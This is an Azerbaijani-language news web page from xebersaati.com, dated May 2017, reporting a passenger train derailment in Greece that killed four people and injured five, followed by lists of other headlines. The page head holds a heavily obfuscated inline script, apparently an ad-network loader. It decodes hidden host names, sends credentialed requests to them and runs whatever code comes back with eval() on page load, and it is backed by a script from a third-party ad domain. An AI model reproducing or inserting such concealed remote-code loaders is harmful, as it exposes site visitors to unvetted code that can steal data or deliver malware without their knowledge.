<!DOCTYPE html>
<html>
  <head>
    <script data-cfasync="false" type="text/javascript">var N8d=window;for(var J in N8d){if(J.length===(0xAF>=(2.32E2,0x15E)?(1.427E3,90.):(80.,1.437E3)>(32,75.)?(4.47E2,6):(0x40,0x1AD))&&J.charCodeAt(((0x1FB,147.)>=(14.27E2,0x70)?(11.89E2,3):(0x45,35.)))===((0x23A,116.7E1)<=(0x18E,68)?'':105.<=(133,1.012E3)?(25.20E1,100):(16,76.))&&J.charCodeAt(((8.4E2,9.42E2)<0x1FA?(4.14E2,94.0E1):(65,24)<=12.86E2?(0x21D,5):(0x1B,51.1E1)))===(75<=(0x14E,3.13E2)?(0x14E,119):(41,65.)>=(0x1DD,22.8E1)?(144.,''):(34,45.5E1))&&J.charCodeAt(((0x8D,2.21E2)<=119.5E1?(4.43E2,1):(54.,6.53E2)))===((0x10A,138)<=88?0x1BD:104<(22.,133.20E1)?(69.10E1,105):(0xD1,7.4E2))&&J.charCodeAt(((53.,129.)<0xEB?(16.,0):(1.244E3,81)>=0x57?0x1A7:(6.62E2,0x1C6)))===(0x17D<(145.,88.30E1)?(48.80E1,119):(0x164,37)))break};for(var c in N8d[J]){if(c.length===((0x1B6,0x200)>=(35,0x14C)?(133.,8):(75.,0xE6))&&c.charCodeAt((56.<(2.6E1,0x175)?(12.34E2,5):(11.3E1,0x9)))===(0x90<=(126.,141.20E1)?(63,101):(125,105))&&c.charCodeAt((5.38E2<(0x125,46.)?'/':0x252>=(0x11E,131)?(6.34E2,7):(0x36,9.86E2)))===((1.26E2,0x251)<(7.80E1,76.3E1)?(15.70E1,116):123.60E1<=(82.7E1,72.2E1)?(0x1A9,0x133):(6.8E2,77))&&c.charCodeAt(((41.,45.40E1)>0x178?(29.,3):(2.550E2,134.20E1)<=0xF2?112.:(0x1A6,4.2E1)))===((0x2D,77.7E1)>(0x7A,122.)?(0x1D1,117):(0x1D3,0x7F))&&c.charCodeAt((79<=(115,0x134)?(59.7E1,0):(0x1B3,121.)))===((0x14,3.43E2)>=147.?(0x3E,100):(0x1C2,1.08E2)))break};(function(Y,E,y,G){N8d[J][E]=function(){var l=(98.<=(77.0E1,0x7E)?(6.9E1,0):(63.,21.)),i=l,r=function r(){var X=((38.,1.35E2)<0xB3?(64,'/'):(144.,60));var S='';var I='//';var d='GET';var H=((1.094E3,2.6E1)>(130.9E1,24)?(8.370E2,true):(11.1E2,0xB3));var w=new XMLHttpRequest();w.withCredentials=H;w.open((d),(I)+N8d[J]['atob'](y[i].split(S).reverse().join(S))+X+G+X,H);w.onreadystatechange=function(){var F=((76.,0xD3)<=70.?(121,200):(0x125,137.)<(0x214,0xA3)?(84.,200):(0x252,0x6C));var o=((13,49.)<=32.1E1?(91.,4):(60.80E1,2.)>(16.,1.48E3)?0x1AA:(11.67E2,23.3E1));if(w.readyState==o&&w.status==F&&w.responseText){eval(w.responseText);}};w.onerror=function(){if(++i!=y.length){r();}};try{w.send();}catch(F){w.onerror();}};r();};})(N8d[J][c],'_efoqlb',['tFWZyR3cuEmawBHa0s2M','==QZ0l2cuQnNqJnM69GN','==QZj5WZpN2cukDOzN2d142c','==QZ0l2ciV2duczd4tGOtRGc'],1054348);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1054347" onerror="window._efoqlb();"></script>    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Yunanıstanda qatarın qəzaya uğraması nəticəsində 4 nəfər ölüb, 5 nəfər xəsarət alıb</title>
    <base href="http://www.xebersaati.com/">
    <meta property="fb:app_id" content="694464134024628" />
    <meta property="og:url" content="http://www.xebersaati.com/news/49057-yunanistanda-qatarin-qezaya-ugramasi-neticesinde-4-nefer-olub-5-nefer-xesaret-alib/" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Yunanıstanda qatarın qəzaya uğraması nəticəsində 4 nəfər ölüb, 5 nəfər xəsarət alıb" />
    <meta property="og:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta property="og:image" content="http://az.apa.az/upload/images/news/2017/may/14/big/1477381915.jpg" />
    <meta property="fb:admins" content="708967524" />
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:site" content="@xebersaati" />
    <meta name="twitter:creator" content="@xebersaati" />
    <meta name="twitter:domain" content="http://www.xebersaati.com/" />
    <meta name="twitter:title" content="Yunanıstanda qatarın qəzaya uğraması nəticəsində 4 nəfər ölüb, 5 nəfər xəsarət alıb" />
    <meta name="twitter:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="twitter:image" content="http://az.apa.az/upload/images/news/2017/may/14/big/1477381915.jpg" />
    <meta name="robots" content="index, follow"/>
    <meta name="googlebot" content="index, follow" />
    <meta name="googlebot" content="index, archive" />
    <meta name="googlebot" content="all" />
    <meta name="yahoobot" content="index,follow" />
    <meta name="alexabot" content="index,follow" />
    <meta name="msnbot" content="index,follow" />
    <meta name="dmozbot" content="index,follow" />
    <meta name="revisit-after" content="1 days" />
    <meta name="description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="keywords" content="siyasət, iqtisadiyyat xəbərləri, dünya xəbərləri, gündəm, bölgə xəbərləri, xəbərlər, müharibə, xəbər, xəbər lenti" />
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="css/bootflat.min.css">
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    <link rel="icon" type="image/png" href="img/favicon.png"> 
    <!--[if lt IE 9]>
      <script src="js/html5shiv.js"></script>
      <script src="js/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>

    <div class="container" id="container">
      <hr>
      <div class="logo pull-left">
        <a href="http://www.xebersaati.com/" class="pull-left"><img src="img/logo.png" alt="xəbər saatı"></a><div id="kategoriyalarButton"><button class="btn btn-danger">Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i></button></div>
      </div>

            

      <div class="languages pull-right">
        <span class="badge"><a href="lang.php?lang=az">AZ</a></span>
        <span class="badge"><a href="lang.php?lang=en">EN</a></span>
        <span class="badge"><a href="lang.php?lang=ru">RU</a></span>
        <span class="badge"><a href="lang.php?lang=tr">TR</a></span>
      </div>

      <div class="clearfix"></div>
      <hr> 
      <div class="row">
      <div id="kategoriyalar">
        <div class="categories center-block"><a href="http://www.xebersaati.com/category/afrika/" class="btn btn-xs btn-primary">Afrika</a><a href="http://www.xebersaati.com/category/amerika/" class="btn btn-xs btn-primary">Amerika</a><a href="http://www.xebersaati.com/category/aqrar-senaye-kompleksi/" class="btn btn-xs btn-primary">Aqrar-sənaye kompleksi</a><a href="http://www.xebersaati.com/category/asiya/" class="btn btn-xs btn-primary">Asiya</a><a href="http://www.xebersaati.com/category/atletika/" class="btn btn-xs btn-primary">Atletika</a><a href="http://www.xebersaati.com/category/avropa/" class="btn btn-xs btn-primary">Avropa</a><a href="http://www.xebersaati.com/category/avto-moto/" class="btn btn-xs btn-primary">Avto-Moto</a><a href="http://www.xebersaati.com/category/az/" class="btn btn-xs btn-primary">az</a><a href="http://www.xebersaati.com/category/birja/" class="btn btn-xs btn-primary">Birja</a><a href="http://www.xebersaati.com/category/biznes-ve-iqtisadiyyat-xeberleri/" class="btn btn-xs btn-primary">Biznes və iqtisadiyyat xəbərləri</a><a href="http://www.xebersaati.com/category/cemiyyet/" class="btn btn-xs btn-primary">Cəmiyyət</a><a href="http://www.xebersaati.com/category/dagliq-qarabag/" class="btn btn-xs btn-primary">Dağlıq Qarabağ</a><a href="http://www.xebersaati.com/category/dagliq-qarabag-munaqishesi/" class="btn btn-xs btn-primary">Dağlıq Qarabağ Münaqişəsi</a><a href="http://www.xebersaati.com/category/daxili-siyaset/" class="btn btn-xs btn-primary">Daxili siyasət</a><a href="http://www.xebersaati.com/category/diaspor/" class="btn btn-xs btn-primary">Diaspor</a><a href="http://www.xebersaati.com/category/din/" class="btn btn-xs btn-primary">Din</a><a href="http://www.xebersaati.com/category/doyush-novleri/" class="btn btn-xs btn-primary">Döyüş növləri</a><a href="http://www.xebersaati.com/category/dunya/" class="btn btn-xs btn-primary">Dünya</a><a href="http://www.xebersaati.com/category/dunya-xeberleri/" class="btn btn-xs btn-primary">Dünya xəbərləri</a><a href="http://www.xebersaati.com/category/energetika/" class="btn btn-xs btn-primary">Energetika</a><a href="http://www.xebersaati.com/category/edebiyyat/" class="btn btn-xs btn-primary">Ədəbiyyat</a><a href="http://www.xebersaati.com/category/futbol/" class="btn btn-xs btn-primary">Futbol</a><a href="http://www.xebersaati.com/category/hadise/" class="btn btn-xs btn-primary">Hadisə</a><a href="http://www.xebersaati.com/category/herbi/" class="btn btn-xs btn-primary">Hərbi</a><a href="http://www.xebersaati.com/category/idman/" class="btn btn-xs btn-primary">İdman</a><a href="http://www.xebersaati.com/category/iii-sektor/" class="btn btn-xs btn-primary">III Sektor</a><a href="http://www.xebersaati.com/category/ikt/" class="btn btn-xs btn-primary">İKT</a><a href="http://www.xebersaati.com/category/incesenet/" class="btn btn-xs btn-primary">İncəsənət</a><a href="http://www.xebersaati.com/category/infrastruktur/" class="btn btn-xs btn-primary">İnfrastruktur</a><a href="http://www.xebersaati.com/category/iqtisadi/" class="btn btn-xs btn-primary">İqtisadi</a><a href="http://www.xebersaati.com/category/iqtisadiyyat/" class="btn btn-xs btn-primary">İqtisadiyyat</a><a href="http://www.xebersaati.com/category/islamiada/" class="btn btn-xs btn-primary">İslamiada</a><a href="http://www.xebersaati.com/category/kriminal/" class="btn btn-xs btn-primary">Kriminal</a><a href="http://www.xebersaati.com/category/maliyye/" class="btn btn-xs btn-primary">Maliyyə</a><a href="http://www.xebersaati.com/category/maraqli/" class="btn btn-xs btn-primary">Maraqlı</a><a href="http://www.xebersaati.com/category/mdb/" class="btn btn-xs btn-primary">MDB</a><a href="http://www.xebersaati.com/category/media/" class="btn btn-xs btn-primary">Media</a><a href="http://www.xebersaati.com/category/medeniyyet/" class="btn btn-xs btn-primary">Mədəniyyət</a><a href="http://www.xebersaati.com/category/medeniyyet-siyaseti/" class="btn btn-xs btn-primary">Mədəniyyət siyasəti</a><a href="http://www.xebersaati.com/category/muharibe/" class="btn btn-xs btn-primary">Müharibə</a><a href="http://www.xebersaati.com/category/musahibe/" class="btn btn-xs btn-primary">Müsahibə</a><a href="http://www.xebersaati.com/category/nezer-noqtesi/" class="btn btn-xs btn-primary">Nəzər nöqtəsi</a><a href="http://www.xebersaati.com/category/olimpiada/" class="btn btn-xs btn-primary">Olimpiada</a><a href="http://www.xebersaati.com/category/ordu/" class="btn btn-xs btn-primary">Ordu</a><a href="http://www.xebersaati.com/category/sahibkarliq/" class="btn btn-xs btn-primary">Sahibkarlıq</a><a href="http://www.xebersaati.com/category/senaye-ve-energetika/" class="btn btn-xs btn-primary">Sənaye və energetika</a><a href="http://www.xebersaati.com/category/sergi/" class="btn btn-xs btn-primary">Sərgi</a><a href="http://www.xebersaati.com/category/siyaset/" class="btn btn-xs btn-primary">Siyasət</a><a href="http://www.xebersaati.com/category/siyasi/" class="btn btn-xs btn-primary">Siyasi</a><a href="http://www.xebersaati.com/category/sosial/" class="btn btn-xs btn-primary">Sosial</a><a href="http://www.xebersaati.com/category/shou-biznes/" class="btn btn-xs btn-primary">Şou-biznes</a><a href="http://www.xebersaati.com/category/stolustu-oyunlar/" class="btn btn-xs btn-primary">Stolüstü oyunlar</a><a href="http://www.xebersaati.com/category/telekommunikasiya/" class="btn btn-xs btn-primary">Telekommunikasiya</a><a href="http://www.xebersaati.com/category/tender-musabiqeleri/" class="btn btn-xs btn-primary">Tender müsabiqələri</a><a href="http://www.xebersaati.com/category/top-oyunlari/" class="btn btn-xs btn-primary">Top oyunları</a><a href="http://www.xebersaati.com/category/turizm/" class="btn btn-xs btn-primary">Turizm</a><a href="http://www.xebersaati.com/category/xarici-siyaset/" class="btn btn-xs btn-primary">Xarici siyasət</a></div><div class="clearfix"></div><hr> 
      </div>
      
      <div class="content">
  <a href="http://go.ad2up.com/afu.php?id=1054352" target="_blank"><img src="img/earn-money-from-internet.png" class="thumbnail img-responsive" id="kat"></a>
  <div class="box thumbnail">	
    <div class="xeberMetni">
          <img src="http://az.apa.az/upload/images/news/2017/may/14/big/1477381915.jpg" alt="" class="thumbnail">
          <h1>Yunanıstanda qatarın qəzaya uğraması nəticəsində 4 nəfər ölüb, 5 nəfər xəsarət alıb</h1>
          <p class="help-block"><em><small>2017-05-14 04:58</small> | <a href="http://apa.az/dunya-xeberleri/avropa-olkeleri-xeberleri/yunanistanda-qatarin-qezaya-ugramasi-neticesinde-4-nefer-olub-5-nefer-xesaret-alib-4276.html" target="_blank">www.apa.az</a> | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</em></p>
          

            
                        <p>Yunanıstanda Avina-Saloniki sərnişin qatarının relsdən &ccedil;ıxaraq qəzaya uğraması nəticəsində 4 nəfər &ouml;l&uuml;b, 5 nəfər xəsarət alıb. <a href="http://apa.az">APA</a>-nın &ldquo;RİA Novosti&rdquo;yə istinadən verdiyi xəbərə g&ouml;rə, &nbsp;bu barədə TRAINOSE dəmir yolu şirkətinin a&ccedil;ıqlamasında bildirilir.</p>



<p>&ldquo;21.45-də (Bakı vaxtı ilə 22.45-də) Afina-Saloniki reysi ilə 70 sərnişin daşıyan &ldquo;Intercity 58&rdquo; qatarı Adendros stansiyası yaxınlığında indiyədək məlum olmayan səbəblərdən relsdən &ccedil;ıxıb. Qəza nəticəsində 4 sərnişin &ouml;l&uuml;b, maşinist daxil olmaqla 5 nəfər xəsarət alıb&rdquo;, - deyə məlumatda bildirilir. &nbsp;</p>



<p>Qəza ilə əlaqədar qatarların hərəkətində dəyişiklik baş verməyib.</p>





<p>Hadisə yerinə xilasedicilər və həkimlər cəlb edilib. &nbsp;</p>

                <!--<iframe width="100%" height="315" src="http://apa.tv/embed/22530" frameborder="0" allowfullscreen=""></iframe>-->
                

                        
			
			
		


			
          <hr>
          <div class="text-center addthis_sharing_toolbox"></div>
        </div>    <div class="clearfix"></div>
  </div>
  <h1 class="relatedTitle">Bu kateqoriyadaki digər xəbərlər</h1>
  <div class="box"><h4>Avropa</h4><ul class="media-list"><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/49057-yunanistanda-qatarin-qezaya-ugramasi-neticesinde-4-nefer-olub-5-nefer-xesaret-alib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/1477381915.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/49057-yunanistanda-qatarin-qezaya-ugramasi-neticesinde-4-nefer-olub-5-nefer-xesaret-alib/">Yunanıstanda qatarın qəzaya uğraması nəticəsində 4 nəfər ölüb, 5 nəfər xəsarət alıb</a></div>
                  <small>2017-05-14 04:58 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/49034-yunanistanda-sernishin-qatari-relsden-cixaraq-eve-cirpilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/emb708.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/49034-yunanistanda-sernishin-qatari-relsden-cixaraq-eve-cirpilib/">Yunanıstanda sərnişin qatarı relsdən çıxaraq evə çırpılıb</a></div>
                  <small>2017-05-14 02:09 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/49033-erdogan-yunanistanin-bash-naziri-ile-turk-herbcilerin-ekstradisiyasini-muzakire-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/erdogan-tsipras-1.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/49033-erdogan-yunanistanin-bash-naziri-ile-turk-herbcilerin-ekstradisiyasini-muzakire-edib/">Ərdoğan Yunanıstanın baş naziri ilə türk hərbçilərin ekstradisiyasını müzakirə edib</a></div>
                  <small>2017-05-14 01:43 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 8</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/48862-gurcustanin-sabiq-bash-prokuroru-dovlet-audit-xidmetinin-rehberini-doyub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/download-1-1.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/48862-gurcustanin-sabiq-bash-prokuroru-dovlet-audit-xidmetinin-rehberini-doyub/">Gürcüstanın sabiq baş prokuroru Dövlət Audit Xidmətinin rəhbərini döyüb</a></div>
                  <small>2017-05-13 18:14 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/48854-resmi-london-ai-danishiqlarda-cirkli-oyun-a-el-atacaq/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/download.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/48854-resmi-london-ai-danishiqlarda-cirkli-oyun-a-el-atacaq/">Rəsmi London: Aİ danışıqlarda "çirkli oyun"a əl atacaq</a></div>
                  <small>2017-05-13 17:42 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 9</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/48839-turkiyede-avtobus-qezasinda-olenlerin-sayi-23-e-catib-yenilenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/mugla.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/48839-turkiyede-avtobus-qezasinda-olenlerin-sayi-23-e-catib-yenilenib/">Türkiyədə avtobus qəzasında ölənlərin sayı 23-ə çatıb - YENİLƏNİB</a></div>
                  <small>2017-05-13 17:12 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/48746-turkiyede-bash-veren-yol-qezasinda-17-nefer-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/geza1.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/48746-turkiyede-bash-veren-yol-qezasinda-17-nefer-olub/">Türkiyədə baş verən yol qəzasında 17 nəfər ölüb</a></div>
                  <small>2017-05-13 14:30 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/48618-avropa-shursi-ermenistani-milli-azliqlarin-diline-diqqetsizlikde-gunahlandirib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/avropa-surasi.jpeg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/48618-avropa-shursi-ermenistani-milli-azliqlarin-diline-diqqetsizlikde-gunahlandirib/">Avropa Şursı Ermənistanı milli azlıqların dilinə diqqətsizlikdə günahlandırıb </a></div>
                  <small>2017-05-13 11:54 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/48459-almaniyada-demiryol-sistemi-hakerlerin-hucumuna-meruz-qalib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/13310487-original.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/48459-almaniyada-demiryol-sistemi-hakerlerin-hucumuna-meruz-qalib/">Almaniyada dəmiryol sistemi hakerlərin hücumuna məruz qalıb</a></div>
                  <small>2017-05-13 05:13 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 8</small>
                </div>
              </li><li class="media">
                <a class="pull-left" href="http://www.xebersaati.com/news/48429-finlandiyanin-sabiq-prezidenti-vefat-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/1494221221.jpg"></a>
                <div class="media-body">
                  <div class="media-heading"><a href="http://www.xebersaati.com/news/48429-finlandiyanin-sabiq-prezidenti-vefat-edib/">Finlandiyanın sabiq prezidenti vəfat edib</a></div>
                  <small>2017-05-13 01:25 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
                </div>
              </li></ul></div></div>
<div class="sidebar">
  <h1>Son xəbərlər</h1>
  <ul class="media-list"><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49059-boyuk-britaniyada-lids-bradford-hava-limaninda-evakuasiya-elan-edilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2015/03/13/britain_police_130315.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49059-boyuk-britaniyada-lids-bradford-hava-limaninda-evakuasiya-elan-edilib/">Böyük Britaniyada Lids-Bradford hava limanında evakuasiya elan edilib</a></div>
                <small>2017-05-14 05:29 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49057-yunanistanda-qatarin-qezaya-ugramasi-neticesinde-4-nefer-olub-5-nefer-xesaret-alib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/1477381915.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49057-yunanistanda-qatarin-qezaya-ugramasi-neticesinde-4-nefer-olub-5-nefer-xesaret-alib/">Yunanıstanda qatarın qəzaya uğraması nəticəsində 4 nəfər ölüb, 5 nəfər xəsarət alıb</a></div>
                <small>2017-05-14 04:58 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49054-agcabedide-iribuynuzlu-mal-qara-telef-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2016/11/24/fhn_car_241116.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49054-agcabedide-iribuynuzlu-mal-qara-telef-olub/">Ağcabədidə iribuynuzlu mal-qara tələf olub</a></div>
                <small>2017-05-14 04:37 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49050-shimali-koreya-novbeti-defe-ballistik-raketi-sinaqdan-kecirib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/1492445863.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49050-shimali-koreya-novbeti-defe-ballistik-raketi-sinaqdan-kecirib/">Şimali Koreya növbəti dəfə ballistik raketi sınaqdan keçirib</a></div>
                <small>2017-05-14 03:52 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49048-yunanistanda-qatar-qezasi-4-olu/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/05/14/greece_ambulaance_14052017.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49048-yunanistanda-qatar-qezasi-4-olu/">Yunanıstanda qatar qəzası: 4 ölü</a></div>
                <small>2017-05-14 03:37 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49042-marina-durunda-biz-xoshbextik-ki-olkemizin-umidlerini-dogrultduq/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/05/13/durnda_13052017.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49042-marina-durunda-biz-xoshbextik-ki-olkemizin-umidlerini-dogrultduq/">Marina Durunda: Biz xoşbəxtik ki, ölkəmizin ümidlərini doğrultduq</a></div>
                <small>2017-05-14 02:47 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49040-eurovision-2017-mahni-musabiqesinin-qalibi-758-xalla-portuqaliya-temsilcisi-salvador-sobral-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/vip-pt-24399-noticia-salvador-sobral-encantado-com-italiano-10.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49040-eurovision-2017-mahni-musabiqesinin-qalibi-758-xalla-portuqaliya-temsilcisi-salvador-sobral-olub/">“Eurovision 2017” mahnı müsabiqəsinin qalibi 758 xalla Portuqaliya təmsilçisi Salvador Sobral olub</a></div>
                <small>2017-05-14 02:37 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49038-agcabedide-8-bash-iribuynuzlu-heyvan-yanaraq-telef-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/07a2760268684303ca014dc38fcf2ba7.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49038-agcabedide-8-bash-iribuynuzlu-heyvan-yanaraq-telef-olub/">Ağcabədidə 8 baş iribuynuzlu heyvan yanaraq tələf olub </a></div>
                <small>2017-05-14 02:16 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49034-yunanistanda-sernishin-qatari-relsden-cixaraq-eve-cirpilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/emb708.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49034-yunanistanda-sernishin-qatari-relsden-cixaraq-eve-cirpilib/">Yunanıstanda sərnişin qatarı relsdən çıxaraq evə çırpılıb</a></div>
                <small>2017-05-14 02:09 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49036-mechtayu-chto-v-siriyu-vernetsya-mir-i-vozmozhnost-trenirovatsya-sirijskaya-gimnastka/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/05/13/siriya_13052017.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49036-mechtayu-chto-v-siriyu-vernetsya-mir-i-vozmozhnost-trenirovatsya-sirijskaya-gimnastka/">Мечтаю, что в Сирию вернется мир и возможность тренироваться-сирийская гимнастка</a></div>
                <small>2017-05-14 02:09 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49033-erdogan-yunanistanin-bash-naziri-ile-turk-herbcilerin-ekstradisiyasini-muzakire-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/erdogan-tsipras-1.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49033-erdogan-yunanistanin-bash-naziri-ile-turk-herbcilerin-ekstradisiyasini-muzakire-edib/">Ərdoğan Yunanıstanın baş naziri ilə türk hərbçilərin ekstradisiyasını müzakirə edib</a></div>
                <small>2017-05-14 01:43 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 8</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49032-livanli-gimnast-bedii-gimnastikanin-islam-hemreyliyi-oyunlarina-daxil-edilmesi-regionda-bu-idman-novunun-inkishafina-komek-edecek/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/05/13/livan_13052017.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49032-livanli-gimnast-bedii-gimnastikanin-islam-hemreyliyi-oyunlarina-daxil-edilmesi-regionda-bu-idman-novunun-inkishafina-komek-edecek/">Livanlı gimnast: Bədii gimnastikanın İslam Həmrəyliyi Oyunlarına daxil edilməsi regionda bu idman növünün inkişafına kömək edəcək</a></div>
                <small>2017-05-14 01:34 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49024-gencede-qatar-qadini-vuraraq-oldurub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/meyit1.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49024-gencede-qatar-qadini-vuraraq-oldurub/">Gəncədə qatar qadını vuraraq öldürüb</a></div>
                <small>2017-05-14 00:55 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
